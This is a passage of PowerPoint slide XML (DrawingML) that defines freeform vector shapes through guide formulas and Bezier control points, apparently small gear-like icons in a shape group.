                <a:gd name="T33" fmla="*/ 88 h 250"/>
                <a:gd name="T34" fmla="*/ 51 w 256"/>
                <a:gd name="T35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0">
                  <a:moveTo>
                    <a:pt x="124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2" y="89"/>
                    <a:pt x="35" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="80"/>
                    <a:pt x="25" y="66"/>
                    <a:pt x="34" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="6"/>
                    <a:pt x="150" y="0"/>
                    <a:pt x="200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1" y="236"/>
                    <a:pt x="157" y="250"/>
                    <a:pt x="124" y="250"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="51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3" y="143"/>
                    <a:pt x="61" y="168"/>
                    <a:pt x="80" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="196"/>
                    <a:pt x="112" y="201"/>
                    <a:pt x="130" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="198"/>
                    <a:pt x="164" y="190"/>
                    <a:pt x="176" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="162"/>
                    <a:pt x="193" y="144"/>
                    <a:pt x="191" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="108"/>
                    <a:pt x="181" y="92"/>
                    <a:pt x="167" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="68"/>
                    <a:pt x="136" y="63"/>
                    <a:pt x="118" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="66"/>
                    <a:pt x="84" y="75"/>
                    <a:pt x="72" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="95"/>
                    <a:pt x="58" y="98"/>
                    <a:pt x="51" y="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29" name="Freeform 362">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D36B594-ECB6-43FB-A9C3-54F4D5E8CD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12627" y="4311594"/>
              <a:ext cx="472777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8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81 w 635"/>
                <a:gd name="T45" fmla="*/ 399 h 635"/>
                <a:gd name="T46" fmla="*/ 537 w 635"/>
                <a:gd name="T47" fmla="*/ 280 h 635"/>
                <a:gd name="T48" fmla="*/ 562 w 635"/>
                <a:gd name="T49" fmla="*/ 189 h 635"/>
                <a:gd name="T50" fmla="*/ 447 w 635"/>
                <a:gd name="T51" fmla="*/ 136 h 635"/>
                <a:gd name="T52" fmla="*/ 400 w 635"/>
                <a:gd name="T53" fmla="*/ 53 h 635"/>
                <a:gd name="T54" fmla="*/ 281 w 635"/>
                <a:gd name="T55" fmla="*/ 97 h 635"/>
                <a:gd name="T56" fmla="*/ 190 w 635"/>
                <a:gd name="T57" fmla="*/ 72 h 635"/>
                <a:gd name="T58" fmla="*/ 166 w 635"/>
                <a:gd name="T59" fmla="*/ 158 h 635"/>
                <a:gd name="T60" fmla="*/ 131 w 635"/>
                <a:gd name="T61" fmla="*/ 122 h 635"/>
                <a:gd name="T62" fmla="*/ 138 w 635"/>
                <a:gd name="T63" fmla="*/ 65 h 635"/>
                <a:gd name="T64" fmla="*/ 227 w 635"/>
                <a:gd name="T65" fmla="*/ 4 h 635"/>
                <a:gd name="T66" fmla="*/ 285 w 635"/>
                <a:gd name="T67" fmla="*/ 47 h 635"/>
                <a:gd name="T68" fmla="*/ 368 w 635"/>
                <a:gd name="T69" fmla="*/ 11 h 635"/>
                <a:gd name="T70" fmla="*/ 475 w 635"/>
                <a:gd name="T71" fmla="*/ 31 h 635"/>
                <a:gd name="T72" fmla="*/ 485 w 635"/>
                <a:gd name="T73" fmla="*/ 103 h 635"/>
                <a:gd name="T74" fmla="*/ 569 w 635"/>
                <a:gd name="T75" fmla="*/ 136 h 635"/>
                <a:gd name="T76" fmla="*/ 631 w 635"/>
                <a:gd name="T77" fmla="*/ 226 h 635"/>
                <a:gd name="T78" fmla="*/ 587 w 635"/>
                <a:gd name="T79" fmla="*/ 284 h 635"/>
                <a:gd name="T80" fmla="*/ 587 w 635"/>
                <a:gd name="T81" fmla="*/ 349 h 635"/>
                <a:gd name="T82" fmla="*/ 631 w 635"/>
                <a:gd name="T83" fmla="*/ 407 h 635"/>
                <a:gd name="T84" fmla="*/ 570 w 635"/>
                <a:gd name="T85" fmla="*/ 497 h 635"/>
                <a:gd name="T86" fmla="*/ 485 w 635"/>
                <a:gd name="T87" fmla="*/ 530 h 635"/>
                <a:gd name="T88" fmla="*/ 499 w 635"/>
                <a:gd name="T89" fmla="*/ 569 h 635"/>
                <a:gd name="T90" fmla="*/ 408 w 635"/>
                <a:gd name="T91" fmla="*/ 631 h 635"/>
                <a:gd name="T92" fmla="*/ 107 w 635"/>
                <a:gd name="T93" fmla="*/ 481 h 635"/>
                <a:gd name="T94" fmla="*/ 69 w 635"/>
                <a:gd name="T95" fmla="*/ 449 h 635"/>
                <a:gd name="T96" fmla="*/ 52 w 635"/>
                <a:gd name="T97" fmla="*/ 240 h 635"/>
                <a:gd name="T98" fmla="*/ 69 w 635"/>
                <a:gd name="T99" fmla="*/ 18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7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1"/>
                    <a:pt x="279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6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5"/>
                    <a:pt x="79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8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2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2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6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4"/>
                    <a:pt x="429" y="515"/>
                    <a:pt x="447" y="498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16" y="428"/>
                    <a:pt x="544" y="428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7" y="399"/>
                    <a:pt x="537" y="378"/>
                    <a:pt x="537" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537" y="280"/>
                    <a:pt x="537" y="280"/>
                    <a:pt x="537" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537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44" y="205"/>
                    <a:pt x="516" y="205"/>
                    <a:pt x="499" y="188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6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5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7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6" y="79"/>
                    <a:pt x="138" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="50"/>
                    <a:pt x="148" y="38"/>
                    <a:pt x="161" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="20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4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1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close/>
                  <a:moveTo>
                    <a:pt x="69" y="185"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="185"/>
                    <a:pt x="69" y="185"/>
                    <a:pt x="69" y="185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30" name="Freeform 363">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BD3D86C-078B-42A9-8375-21754DA982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7876" y="4451148"/>
              <a:ext cx="190821" cy="185125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 123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4 w 256"/>
                <a:gd name="T7" fmla="*/ 90 h 250"/>
                <a:gd name="T8" fmla="*/ 33 w 256"/>
                <a:gd name="T9" fmla="*/ 56 h 250"/>
                <a:gd name="T10" fmla="*/ 199 w 256"/>
                <a:gd name="T11" fmla="*/ 42 h 250"/>
                <a:gd name="T12" fmla="*/ 214 w 256"/>
                <a:gd name="T13" fmla="*/ 208 h 250"/>
                <a:gd name="T14" fmla="*/ 123 w 256"/>
                <a:gd name="T15" fmla="*/ 250 h 250"/>
                <a:gd name="T16" fmla="*/ 50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75 w 256"/>
                <a:gd name="T23" fmla="*/ 176 h 250"/>
                <a:gd name="T24" fmla="*/ 167 w 256"/>
                <a:gd name="T25" fmla="*/ 80 h 250"/>
                <a:gd name="T26" fmla="*/ 118 w 256"/>
                <a:gd name="T27" fmla="*/ 65 h 250"/>
                <a:gd name="T28" fmla="*/ 72 w 256"/>
                <a:gd name="T29" fmla="*/ 88 h 250"/>
                <a:gd name="T30" fmla="*/ 50 w 256"/>
                <a:gd name="T31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6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53" y="69"/>
                    <a:pt x="136" y="63"/>
                    <a:pt x="118" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="66"/>
                    <a:pt x="83" y="75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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="438" name="Gruppe 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5EA8A9-2056-4CE1-ABC7-0CA346A8DC2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4362450" y="4984750"/>
            <a:ext cx="387900" cy="540684"/>
            <a:chOff x="5025291" y="3667933"/>
            <a:chExt cx="860113" cy="1116439"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="439" name="Freeform 358">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4609277C-0F53-4753-B0E3-A1C4DC908B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9777" y="3667933"/>
              <a:ext cx="475626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7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31 w 635"/>
                <a:gd name="T45" fmla="*/ 432 h 635"/>
                <a:gd name="T46" fmla="*/ 581 w 635"/>
                <a:gd name="T47" fmla="*/ 399 h 635"/>
                <a:gd name="T48" fmla="*/ 536 w 635"/>
                <a:gd name="T49" fmla="*/ 280 h 635"/>
                <a:gd name="T50" fmla="*/ 562 w 635"/>
                <a:gd name="T51" fmla="*/ 189 h 635"/>
                <a:gd name="T52" fmla="*/ 531 w 635"/>
                <a:gd name="T53" fmla="*/ 201 h 635"/>
                <a:gd name="T54" fmla="*/ 447 w 635"/>
                <a:gd name="T55" fmla="*/ 136 h 635"/>
                <a:gd name="T56" fmla="*/ 400 w 635"/>
                <a:gd name="T57" fmla="*/ 53 h 635"/>
                <a:gd name="T58" fmla="*/ 281 w 635"/>
                <a:gd name="T59" fmla="*/ 97 h 635"/>
                <a:gd name="T60" fmla="*/ 190 w 635"/>
                <a:gd name="T61" fmla="*/ 72 h 635"/>
                <a:gd name="T62" fmla="*/ 166 w 635"/>
                <a:gd name="T63" fmla="*/ 158 h 635"/>
                <a:gd name="T64" fmla="*/ 131 w 635"/>
                <a:gd name="T65" fmla="*/ 122 h 635"/>
                <a:gd name="T66" fmla="*/ 137 w 635"/>
                <a:gd name="T67" fmla="*/ 65 h 635"/>
                <a:gd name="T68" fmla="*/ 227 w 635"/>
                <a:gd name="T69" fmla="*/ 4 h 635"/>
                <a:gd name="T70" fmla="*/ 285 w 635"/>
                <a:gd name="T71" fmla="*/ 47 h 635"/>
                <a:gd name="T72" fmla="*/ 368 w 635"/>
                <a:gd name="T73" fmla="*/ 11 h 635"/>
                <a:gd name="T74" fmla="*/ 475 w 635"/>
                <a:gd name="T75" fmla="*/ 31 h 635"/>
                <a:gd name="T76" fmla="*/ 485 w 635"/>
                <a:gd name="T77" fmla="*/ 103 h 635"/>
                <a:gd name="T78" fmla="*/ 569 w 635"/>
                <a:gd name="T79" fmla="*/ 136 h 635"/>
                <a:gd name="T80" fmla="*/ 631 w 635"/>
                <a:gd name="T81" fmla="*/ 226 h 635"/>
                <a:gd name="T82" fmla="*/ 587 w 635"/>
                <a:gd name="T83" fmla="*/ 284 h 635"/>
                <a:gd name="T84" fmla="*/ 587 w 635"/>
                <a:gd name="T85" fmla="*/ 349 h 635"/>
                <a:gd name="T86" fmla="*/ 631 w 635"/>
                <a:gd name="T87" fmla="*/ 407 h 635"/>
                <a:gd name="T88" fmla="*/ 570 w 635"/>
                <a:gd name="T89" fmla="*/ 497 h 635"/>
                <a:gd name="T90" fmla="*/ 485 w 635"/>
                <a:gd name="T91" fmla="*/ 530 h 635"/>
                <a:gd name="T92" fmla="*/ 499 w 635"/>
                <a:gd name="T93" fmla="*/ 569 h 635"/>
                <a:gd name="T94" fmla="*/ 408 w 635"/>
                <a:gd name="T95" fmla="*/ 631 h 635"/>
                <a:gd name="T96" fmla="*/ 107 w 635"/>
                <a:gd name="T97" fmla="*/ 481 h 635"/>
                <a:gd name="T98" fmla="*/ 76 w 635"/>
                <a:gd name="T99" fmla="*/ 450 h 635"/>
                <a:gd name="T100" fmla="*/ 69 w 635"/>
                <a:gd name="T101" fmla="*/ 449 h 635"/>
                <a:gd name="T102" fmla="*/ 52 w 635"/>
                <a:gd name="T103" fmla="*/ 240 h 635"/>
                <a:gd name="T104" fmla="*/ 69 w 635"/>
                <a:gd name="T105" fmla="*/ 184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6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6"/>
                    <a:pt x="285" y="586"/>
                    <a:pt x="285" y="586"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="601"/>
                    <a:pt x="278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5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94" y="495"/>
                    <a:pt x="80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7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1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1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5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3"/>
                    <a:pt x="429" y="515"/>
                    <a:pt x="447" y="497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07" y="437"/>
                    <a:pt x="519" y="432"/>
                    <a:pt x="531" y="432"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="432"/>
                    <a:pt x="531" y="432"/>
                    <a:pt x="531" y="432"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="543" y="432"/>
                    <a:pt x="554" y="437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6" y="399"/>
                    <a:pt x="536" y="378"/>
                    <a:pt x="536" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="536" y="280"/>
                    <a:pt x="536" y="280"/>
                    <a:pt x="536" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="536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53" y="197"/>
                    <a:pt x="542" y="201"/>
                    <a:pt x="531" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="201"/>
                    <a:pt x="531" y="201"/>
                    <a:pt x="531" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="519" y="201"/>
                    <a:pt x="507" y="196"/>
                    <a:pt x="498" y="187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5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4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6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5" y="79"/>
                    <a:pt x="137" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="50"/>
                    <a:pt x="148" y="38"/>
                    <a:pt x="161" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="19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3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0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76" y="450"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="450"/>
                    <a:pt x="76" y="450"/>
                    <a:pt x="76" y="450"/>
                  </a:cubicBezTo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moveTo>
                    <a:pt x="69" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="184"/>
                    <a:pt x="69" y="184"/>
                    <a:pt x="69" y="184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40" name="Freeform 359">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97AAB67F-A602-4C22-8EF5-AA1AC00E3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5029" y="3807487"/>
              <a:ext cx="190821" cy="185125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 123 w 255"/>
                <a:gd name="T1" fmla="*/ 250 h 250"/>
                <a:gd name="T2" fmla="*/ 48 w 255"/>
                <a:gd name="T3" fmla="*/ 222 h 250"/>
                <a:gd name="T4" fmla="*/ 8 w 255"/>
                <a:gd name="T5" fmla="*/ 110 h 250"/>
                <a:gd name="T6" fmla="*/ 34 w 255"/>
                <a:gd name="T7" fmla="*/ 90 h 250"/>
                <a:gd name="T8" fmla="*/ 33 w 255"/>
                <a:gd name="T9" fmla="*/ 56 h 250"/>
                <a:gd name="T10" fmla="*/ 199 w 255"/>
                <a:gd name="T11" fmla="*/ 42 h 250"/>
                <a:gd name="T12" fmla="*/ 214 w 255"/>
                <a:gd name="T13" fmla="*/ 208 h 250"/>
                <a:gd name="T14" fmla="*/ 123 w 255"/>
                <a:gd name="T15" fmla="*/ 250 h 250"/>
                <a:gd name="T16" fmla="*/ 50 w 255"/>
                <a:gd name="T17" fmla="*/ 97 h 250"/>
                <a:gd name="T18" fmla="*/ 57 w 255"/>
                <a:gd name="T19" fmla="*/ 119 h 250"/>
                <a:gd name="T20" fmla="*/ 80 w 255"/>
                <a:gd name="T21" fmla="*/ 184 h 250"/>
                <a:gd name="T22" fmla="*/ 175 w 255"/>
                <a:gd name="T23" fmla="*/ 176 h 250"/>
                <a:gd name="T24" fmla="*/ 167 w 255"/>
                <a:gd name="T25" fmla="*/ 80 h 250"/>
                <a:gd name="T26" fmla="*/ 72 w 255"/>
                <a:gd name="T27" fmla="*/ 88 h 250"/>
                <a:gd name="T28" fmla="*/ 50 w 255"/>
                <a:gd name="T29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5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5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8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39" y="56"/>
                    <a:pt x="96" y="60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41" name="Freeform 360">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC8046D6-C7C5-43BC-B3EA-530A68B695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25291" y="4009700"/>
              <a:ext cx="475626" cy="472778"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 368 w 635"/>
                <a:gd name="T1" fmla="*/ 624 h 636"/>
                <a:gd name="T2" fmla="*/ 350 w 635"/>
                <a:gd name="T3" fmla="*/ 587 h 636"/>
                <a:gd name="T4" fmla="*/ 267 w 635"/>
                <a:gd name="T5" fmla="*/ 624 h 636"/>
                <a:gd name="T6" fmla="*/ 160 w 635"/>
                <a:gd name="T7" fmla="*/ 603 h 636"/>
                <a:gd name="T8" fmla="*/ 150 w 635"/>
                <a:gd name="T9" fmla="*/ 531 h 636"/>
                <a:gd name="T10" fmla="*/ 104 w 635"/>
                <a:gd name="T11" fmla="*/ 485 h 636"/>
                <a:gd name="T12" fmla="*/ 32 w 635"/>
                <a:gd name="T13" fmla="*/ 475 h 636"/>
                <a:gd name="T14" fmla="*/ 12 w 635"/>
                <a:gd name="T15" fmla="*/ 368 h 636"/>
                <a:gd name="T16" fmla="*/ 48 w 635"/>
                <a:gd name="T17" fmla="*/ 285 h 636"/>
                <a:gd name="T18" fmla="*/ 4 w 635"/>
                <a:gd name="T19" fmla="*/ 227 h 636"/>
                <a:gd name="T20" fmla="*/ 66 w 635"/>
                <a:gd name="T21" fmla="*/ 137 h 636"/>
                <a:gd name="T22" fmla="*/ 108 w 635"/>
                <a:gd name="T23" fmla="*/ 153 h 636"/>
                <a:gd name="T24" fmla="*/ 73 w 635"/>
                <a:gd name="T25" fmla="*/ 189 h 636"/>
                <a:gd name="T26" fmla="*/ 98 w 635"/>
                <a:gd name="T27" fmla="*/ 281 h 636"/>
                <a:gd name="T28" fmla="*/ 54 w 635"/>
                <a:gd name="T29" fmla="*/ 400 h 636"/>
                <a:gd name="T30" fmla="*/ 137 w 635"/>
                <a:gd name="T31" fmla="*/ 447 h 636"/>
                <a:gd name="T32" fmla="*/ 189 w 635"/>
                <a:gd name="T33" fmla="*/ 562 h 636"/>
                <a:gd name="T34" fmla="*/ 281 w 635"/>
                <a:gd name="T35" fmla="*/ 537 h 636"/>
                <a:gd name="T36" fmla="*/ 400 w 635"/>
                <a:gd name="T37" fmla="*/ 582 h 636"/>
                <a:gd name="T38" fmla="*/ 447 w 635"/>
                <a:gd name="T39" fmla="*/ 498 h 636"/>
                <a:gd name="T40" fmla="*/ 531 w 635"/>
                <a:gd name="T41" fmla="*/ 433 h 636"/>
                <a:gd name="T42" fmla="*/ 563 w 635"/>
                <a:gd name="T43" fmla="*/ 446 h 636"/>
                <a:gd name="T44" fmla="*/ 537 w 635"/>
                <a:gd name="T45" fmla="*/ 354 h 636"/>
                <a:gd name="T46" fmla="*/ 581 w 635"/>
                <a:gd name="T47" fmla="*/ 235 h 636"/>
                <a:gd name="T48" fmla="*/ 531 w 635"/>
                <a:gd name="T49" fmla="*/ 202 h 636"/>
                <a:gd name="T50" fmla="*/ 499 w 635"/>
                <a:gd name="T51" fmla="*/ 188 h 636"/>
                <a:gd name="T52" fmla="*/ 434 w 635"/>
                <a:gd name="T53" fmla="*/ 104 h 636"/>
                <a:gd name="T54" fmla="*/ 400 w 635"/>
                <a:gd name="T55" fmla="*/ 54 h 636"/>
                <a:gd name="T56" fmla="*/ 281 w 635"/>
                <a:gd name="T57" fmla="*/ 98 h 636"/>
                <a:gd name="T58" fmla="*/ 190 w 635"/>
                <a:gd name="T59" fmla="*/ 73 h 636"/>
                <a:gd name="T60" fmla="*/ 189 w 635"/>
                <a:gd name="T61" fmla="*/ 136 h 636"/>
                <a:gd name="T62" fmla="*/ 131 w 635"/>
                <a:gd name="T63" fmla="*/ 159 h 636"/>
                <a:gd name="T64" fmla="*/ 150 w 635"/>
                <a:gd name="T65" fmla="*/ 104 h 636"/>
                <a:gd name="T66" fmla="*/ 161 w 635"/>
                <a:gd name="T67" fmla="*/ 32 h 636"/>
                <a:gd name="T68" fmla="*/ 267 w 635"/>
                <a:gd name="T69" fmla="*/ 12 h 636"/>
                <a:gd name="T70" fmla="*/ 350 w 635"/>
                <a:gd name="T71" fmla="*/ 48 h 636"/>
                <a:gd name="T72" fmla="*/ 409 w 635"/>
                <a:gd name="T73" fmla="*/ 5 h 636"/>
                <a:gd name="T74" fmla="*/ 498 w 635"/>
                <a:gd name="T75" fmla="*/ 66 h 636"/>
                <a:gd name="T76" fmla="*/ 531 w 635"/>
                <a:gd name="T77" fmla="*/ 150 h 636"/>
                <a:gd name="T78" fmla="*/ 603 w 635"/>
                <a:gd name="T79" fmla="*/ 160 h 636"/>
                <a:gd name="T80" fmla="*/ 624 w 635"/>
                <a:gd name="T81" fmla="*/ 267 h 636"/>
                <a:gd name="T82" fmla="*/ 587 w 635"/>
                <a:gd name="T83" fmla="*/ 285 h 636"/>
                <a:gd name="T84" fmla="*/ 624 w 635"/>
                <a:gd name="T85" fmla="*/ 368 h 636"/>
                <a:gd name="T86" fmla="*/ 604 w 635"/>
                <a:gd name="T87" fmla="*/ 475 h 636"/>
                <a:gd name="T88" fmla="*/ 531 w 635"/>
                <a:gd name="T89" fmla="*/ 485 h 636"/>
                <a:gd name="T90" fmla="*/ 486 w 635"/>
                <a:gd name="T91" fmla="*/ 531 h 636"/>
                <a:gd name="T92" fmla="*/ 476 w 635"/>
                <a:gd name="T93" fmla="*/ 603 h 636"/>
                <a:gd name="T94" fmla="*/ 396 w 635"/>
                <a:gd name="T95" fmla="*/ 633 h 636"/>
                <a:gd name="T96" fmla="*/ 566 w 635"/>
                <a:gd name="T97" fmla="*/ 186 h 636"/>
                <a:gd name="T98" fmla="*/ 528 w 635"/>
                <a:gd name="T99" fmla="*/ 153 h 636"/>
                <a:gd name="T100" fmla="*/ 482 w 635"/>
                <a:gd name="T101" fmla="*/ 107 h 636"/>
                <a:gd name="T102" fmla="*/ 153 w 635"/>
                <a:gd name="T103" fmla="*/ 107 h 636"/>
                <a:gd name="T104" fmla="*/ 449 w 635"/>
                <a:gd name="T105" fmla="*/ 69 h 636"/>
                <a:gd name="T106" fmla="*/ 186 w 635"/>
                <a:gd name="T107" fmla="*/ 69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35" h="636">
                  <a:moveTo>
                    <a:pt x="396" y="633"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="633"/>
                    <a:pt x="376" y="630"/>
                    <a:pt x="368" y="624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="357" y="615"/>
                    <a:pt x="350" y="602"/>
                    <a:pt x="350" y="587"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="587"/>
                    <a:pt x="350" y="587"/>
                    <a:pt x="350" y="587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2"/>
                    <a:pt x="279" y="615"/>
                    <a:pt x="267" y="624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="633"/>
                    <a:pt x="241" y="636"/>
                    <a:pt x="227" y="631"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="625"/>
                    <a:pt x="181" y="615"/>
                    <a:pt x="160" y="603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="596"/>
                    <a:pt x="139" y="584"/>
                    <a:pt x="137" y="570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="556"/>
                    <a:pt x="140" y="541"/>
                    <a:pt x="150" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="531"/>
                    <a:pt x="150" y="531"/>
                    <a:pt x="150" y="531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6"/>
                    <a:pt x="80" y="500"/>
                    <a:pt x="66" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="496"/>
                    <a:pt x="39" y="488"/>
                    <a:pt x="32" y="475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="454"/>
                    <a:pt x="11" y="432"/>
                    <a:pt x="4" y="408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="395"/>
                    <a:pt x="3" y="380"/>
                    <a:pt x="12" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="357"/>
                    <a:pt x="33" y="350"/>
                    <a:pt x="48" y="350"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="285"/>
                    <a:pt x="48" y="285"/>
                    <a:pt x="48" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="285"/>
                    <a:pt x="20" y="279"/>
                    <a:pt x="12" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="255"/>
                    <a:pt x="0" y="241"/>
                    <a:pt x="4" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="204"/>
                    <a:pt x="21" y="181"/>
                    <a:pt x="32" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="147"/>
                    <a:pt x="52" y="139"/>
                    <a:pt x="66" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="135"/>
                    <a:pt x="95" y="140"/>
                    <a:pt x="105" y="150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8" y="163"/>
                    <a:pt x="117" y="179"/>
                    <a:pt x="108" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="198"/>
                    <a:pt x="83" y="198"/>
                    <a:pt x="73" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="204"/>
                    <a:pt x="59" y="219"/>
                    <a:pt x="54" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="236"/>
                    <a:pt x="98" y="256"/>
                    <a:pt x="98" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="354"/>
                    <a:pt x="98" y="354"/>
                    <a:pt x="98" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="379"/>
                    <a:pt x="78" y="399"/>
                    <a:pt x="54" y="400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="416"/>
                    <a:pt x="65" y="431"/>
                    <a:pt x="73" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="429"/>
                    <a:pt x="119" y="429"/>
                    <a:pt x="137" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="499"/>
                    <a:pt x="189" y="499"/>
                    <a:pt x="189" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="516"/>
                    <a:pt x="206" y="545"/>
                    <a:pt x="189" y="562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="570"/>
                    <a:pt x="220" y="577"/>
                    <a:pt x="235" y="582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="557"/>
                    <a:pt x="256" y="537"/>
                    <a:pt x="281" y="537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="537"/>
                    <a:pt x="354" y="537"/>
                    <a:pt x="354" y="537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="537"/>
                    <a:pt x="400" y="557"/>
                    <a:pt x="400" y="582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="416" y="577"/>
                    <a:pt x="432" y="570"/>
                    <a:pt x="446" y="562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="429" y="544"/>
                    <a:pt x="430" y="516"/>
                    <a:pt x="447" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="499" y="447"/>
                    <a:pt x="499" y="447"/>
                    <a:pt x="499" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="438"/>
                    <a:pt x="519" y="433"/>
                    <a:pt x="531" y="433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="433"/>
                    <a:pt x="531" y="433"/>
                    <a:pt x="531" y="433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="543" y="433"/>
                    <a:pt x="554" y="438"/>
                    <a:pt x="563" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
